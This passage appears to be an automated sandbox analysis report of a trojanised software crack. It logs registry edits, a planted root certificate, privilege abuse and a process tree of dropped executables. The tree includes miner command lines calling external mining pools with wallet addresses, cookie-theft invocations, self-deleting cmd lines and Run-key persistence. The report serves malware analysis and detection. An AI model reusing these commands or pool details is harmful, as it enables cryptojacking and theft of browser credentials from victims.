MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "27" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\approval.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\organize.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "324135363" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "84" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "33" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\message.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\readnow.netflowcorp.com MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\release.netflowcorp.com MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2456 PING.EXE 4028 PING.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 188 setups.tmp 188 setups.tmp 4652 7758.tmp.exe 4652 7758.tmp.exe 4744 8441342.exe 4744 8441342.exe 4744 8441342.exe 3144 5342057.exe 3144 5342057.exe 4620 jfiag3g_gg.exe 4620 jfiag3g_gg.exe 3640 8568804.exe 3640 8568804.exe 4796 8568804.exe 4796 8568804.exe 4716 2928718.exe 4716 2928718.exe 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp 1800 jfiag3g_gg.exe 1800 jfiag3g_gg.exe 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp 96 jfiag3g_gg.exe 96 jfiag3g_gg.exe 188 setups.tmp 188 setups.tmp -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 4468 MicrosoftEdgeCP.exe 4468 MicrosoftEdgeCP.exe 4468 MicrosoftEdgeCP.exe 4468 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1768 Setup.exe Token: SeCreateTokenPrivilege 4256 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4256 askinstall20.exe Token: SeLockMemoryPrivilege 4256 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4256 askinstall20.exe Token: SeMachineAccountPrivilege 4256 askinstall20.exe Token: SeTcbPrivilege 4256 askinstall20.exe Token: SeSecurityPrivilege 4256 askinstall20.exe Token: SeTakeOwnershipPrivilege 4256 askinstall20.exe Token: SeLoadDriverPrivilege 4256 askinstall20.exe Token: SeSystemProfilePrivilege 4256 askinstall20.exe Token: SeSystemtimePrivilege 4256 askinstall20.exe Token: SeProfSingleProcessPrivilege 4256 askinstall20.exe Token: SeIncBasePriorityPrivilege 4256 askinstall20.exe Token: SeCreatePagefilePrivilege 4256 askinstall20.exe Token: SeCreatePermanentPrivilege 4256 askinstall20.exe Token: SeBackupPrivilege 4256 askinstall20.exe Token: SeRestorePrivilege 4256 askinstall20.exe Token: SeShutdownPrivilege 4256 askinstall20.exe Token: SeDebugPrivilege 4256 askinstall20.exe Token: SeAuditPrivilege 4256 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4256 askinstall20.exe Token: SeChangeNotifyPrivilege 4256 askinstall20.exe Token: SeRemoteShutdownPrivilege 4256 askinstall20.exe Token: SeUndockPrivilege 4256 askinstall20.exe Token: SeSyncAgentPrivilege 4256 askinstall20.exe Token: SeEnableDelegationPrivilege 4256 askinstall20.exe Token: SeManageVolumePrivilege 4256 askinstall20.exe Token: SeImpersonatePrivilege 4256 askinstall20.exe Token: SeCreateGlobalPrivilege 4256 askinstall20.exe Token: 31 4256 askinstall20.exe Token: 32 4256 askinstall20.exe Token: 33 4256 askinstall20.exe Token: 34 4256 askinstall20.exe Token: 35 4256 askinstall20.exe Token: SeDebugPrivilege 1080 taskkill.exe Token: SeDebugPrivilege 3400 MicrosoftEdge.exe Token: SeDebugPrivilege 3400 MicrosoftEdge.exe Token: SeDebugPrivilege 3400 MicrosoftEdge.exe Token: SeDebugPrivilege 3400 MicrosoftEdge.exe Token: SeDebugPrivilege 1212 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1212 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1212 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1212 MicrosoftEdgeCP.exe Token: SeLockMemoryPrivilege 5000 msiexec.exe Token: SeLockMemoryPrivilege 5000 msiexec.exe Token: SeManageVolumePrivilege 2432 md2_2efs.exe Token: SeManageVolumePrivilege 2432 md2_2efs.exe Token: SeManageVolumePrivilege 2432 md2_2efs.exe Token: SeDebugPrivilege 3140 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3140 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5116 BTRSetp.exe Token: SeDebugPrivilege 4744 8441342.exe Token: SeDebugPrivilege 3860 2928718.exe Token: SeDebugPrivilege 3144 5342057.exe Token: SeDebugPrivilege 3640 8568804.exe Token: SeDebugPrivilege 4796 8568804.exe Token: SeDebugPrivilege 4716 2928718.exe Token: SeDebugPrivilege 3400 MicrosoftEdge.exe Token: SeShutdownPrivilege 332 MicrosoftEdgeCP.exe Token: SeCreatePagefilePrivilege 332 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 332 MicrosoftEdgeCP.exe Token: SeCreatePagefilePrivilege 332 MicrosoftEdgeCP.exe Token: 33 2764 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 4640 setups.exe 188 setups.tmp 3400 MicrosoftEdge.exe 4468 MicrosoftEdgeCP.exe 4468 MicrosoftEdgeCP.exe 3452 MicrosoftEdge.exe 1224 MicrosoftEdgeCP.exe 1224 MicrosoftEdgeCP.exe 4728 MicrosoftEdge.exe 4176 MicrosoftEdgeCP.exe 4176 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4684 wrote to memory of 3892 4684 DBF.Viewer.Pro.3.11.crack.by.F4CG.exe 78 PID 4684 wrote to memory of 3892 4684 DBF.Viewer.Pro.3.11.crack.by.F4CG.exe 78 PID 4684 wrote to memory of 3892 4684 DBF.Viewer.Pro.3.11.crack.by.F4CG.exe 78 PID 3892 wrote to memory of 4068 3892 cmd.exe 81 PID 3892 wrote to memory of 4068 3892 cmd.exe 81 PID 3892 wrote to memory of 4068 3892 cmd.exe 81 PID 3892 wrote to memory of 4044 3892 cmd.exe 82 PID 3892 wrote to memory of 4044 3892 cmd.exe 82 PID 3892 wrote to memory of 4044 3892 cmd.exe 82 PID 3892 wrote to memory of 2056 3892 cmd.exe 83 PID 3892 wrote to memory of 2056 3892 cmd.exe 83 PID 3892 wrote to memory of 2056 3892 cmd.exe 83 PID 3892 wrote to memory of 4512 3892 cmd.exe 84 PID 3892 wrote to memory of 4512 3892 cmd.exe 84 PID 3892 wrote to memory of 4512 3892 cmd.exe 84 PID 4068 wrote to memory of 1460 4068 keygen-pr.exe 85 PID 4068 wrote to memory of 1460 4068 keygen-pr.exe 85 PID 4068 wrote to memory of 1460 4068 keygen-pr.exe 85 PID 4512 wrote to memory of 1768 4512 keygen-step-4.exe 86 PID 4512 wrote to memory of 1768 4512 keygen-step-4.exe 86 PID 1460 wrote to memory of 2212 1460 key.exe 87 PID 1460 wrote to memory of 2212 1460 key.exe 87 PID 1460 wrote to memory of 2212 1460 key.exe 87 PID 2056 wrote to memory of 2292 2056 keygen-step-3.exe 88 PID 2056 wrote to memory of 2292 2056 keygen-step-3.exe 88 PID 2056 wrote to memory of 2292 2056 keygen-step-3.exe 88 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 1768 wrote to memory of 4640 1768 Setup.exe 91 PID 1768 wrote to memory of 4640 1768 Setup.exe 91 PID 1768 wrote to memory of 4640 1768 Setup.exe 91 PID 4512 wrote to memory of 4256 4512 keygen-step-4.exe 92 PID 4512 wrote to memory of 4256 4512 keygen-step-4.exe 92 PID 4512 wrote to memory of 4256 4512 keygen-step-4.exe 92 PID 4640 wrote to memory of 188 4640 setups.exe 93 PID 4640 wrote to memory of 188 4640 setups.exe 93 PID 4640 wrote to memory of 188 4640 setups.exe 93 PID 4256 wrote to memory of 3916 4256 askinstall20.exe 94 PID 4256 wrote to memory of 3916 4256 askinstall20.exe 94 PID 4256 wrote to memory of 3916 4256 askinstall20.exe 94 PID 3916 wrote to memory of 1080 3916 cmd.exe 96 PID 3916 wrote to memory of 1080 3916 cmd.exe 96 PID 3916 wrote to memory of 1080 3916 cmd.exe 96 PID 4512 wrote to memory of 1240 4512 keygen-step-4.exe 102 PID 4512 wrote to memory of 1240 4512 keygen-step-4.exe 102 PID 4512 wrote to memory of 1240 4512 keygen-step-4.exe 102 PID 1240 wrote to memory of 4440 1240 file.exe 103 PID 1240 wrote to memory of 4440 1240 file.exe 103 PID 1240 wrote to memory of 4440 1240 file.exe 103 PID 1240 wrote to memory of 1908 1240 file.exe 104 PID 1240 wrote to memory of 1908 1240 file.exe 104 PID 1240 wrote to memory of 2264 1240 file.exe 105 PID 1240 wrote to memory of 2264 1240 file.exe 105 PID 1240 wrote to memory of 2264 1240 file.exe 105 PID 1240 wrote to memory of 2452 1240 file.exe 106 PID 1240 wrote to memory of 2452 1240 file.exe 106 PID 1240 wrote to memory of 2452 1240 file.exe 106 PID 4512 wrote to memory of 2432 4512 keygen-step-4.exe 109 PID 4512 wrote to memory of 2432 4512 keygen-step-4.exe 109 PID 4512 wrote to memory of 2432 4512 keygen-step-4.exe 109 PID 4440 wrote to memory of 4652 4440 7758.tmp.exe 108 PID 4440 wrote to memory of 4652 4440 7758.tmp.exe 108 PID 4440 wrote to memory of 4652 4440 7758.tmp.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\DBF.Viewer.Pro.3.11.crack.by.F4CG.exe"C:\Users\Admin\AppData\Local\Temp\DBF.Viewer.Pro.3.11.crack.by.F4CG.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4044
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe"C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\is-LLIL5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LLIL5.tmp\setups.tmp" /SL5="$701D0,635399,250368,C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\AppData\Roaming\7758.tmp.exe"C:\Users\Admin\AppData\Roaming\7758.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Roaming\7758.tmp.exe"C:\Users\Admin\AppData\Roaming\7758.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4652
-
-
-
C:\Users\Admin\AppData\Roaming\77E6.tmp.exe"C:\Users\Admin\AppData\Roaming\77E6.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1908 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4676
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
-
C:\Users\Admin\AppData\Roaming\7893.tmp.exe"C:\Users\Admin\AppData\Roaming\7893.tmp.exe"5⤵
- Executes dropped EXE
PID:2264 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\7893.tmp.exe6⤵PID:1940
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4408
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:2452
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5116 -
C:\ProgramData\8441342.exe"C:\ProgramData\8441342.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\ProgramData\5684678.exe"C:\ProgramData\5684678.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4740 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
PID:372
-
-
-
C:\ProgramData\8568804.exe"C:\ProgramData\8568804.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640 -
C:\ProgramData\8568804.exe"{path}"6⤵
- Executes dropped EXE
PID:2668
-
-
C:\ProgramData\8568804.exe"{path}"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
-
C:\ProgramData\2928718.exe"C:\ProgramData\2928718.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3860 -
C:\ProgramData\2928718.exe"{path}"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
-
C:\ProgramData\5342057.exe"C:\ProgramData\5342057.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:96
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3400
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3484
-
